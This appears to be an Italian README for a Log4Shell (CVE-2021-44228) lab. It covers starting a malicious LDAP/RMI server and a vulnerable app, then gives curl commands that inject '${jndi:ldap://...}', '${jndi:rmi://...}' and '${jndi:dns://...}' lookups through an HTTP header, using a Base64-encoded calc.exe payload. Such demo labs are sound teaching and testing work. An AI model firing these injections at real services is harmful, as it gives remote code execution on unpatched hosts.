
Esempi di Log4j CVE-2021-44228: Esecuzione remota di codice (tramite LDAP, RMI, ...), Query DNS forzate, ...
Usa un JDK vulnerabile, ad esempio JDK 1.8.0_181
Il server malevolo distribuisce i seguenti endpoint:
./gradlew :malicious-server:bootRun
L'applicazione vulnerabile espone un endpoint HTTP su 8082
./gradlew :vulnerable-app:bootRun
Scegli un payload che verrà eseguito dall'applicazione vulnerabile e codificalo in Base64. Ad esempio, per aprire la
calcolatrice in Windows: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/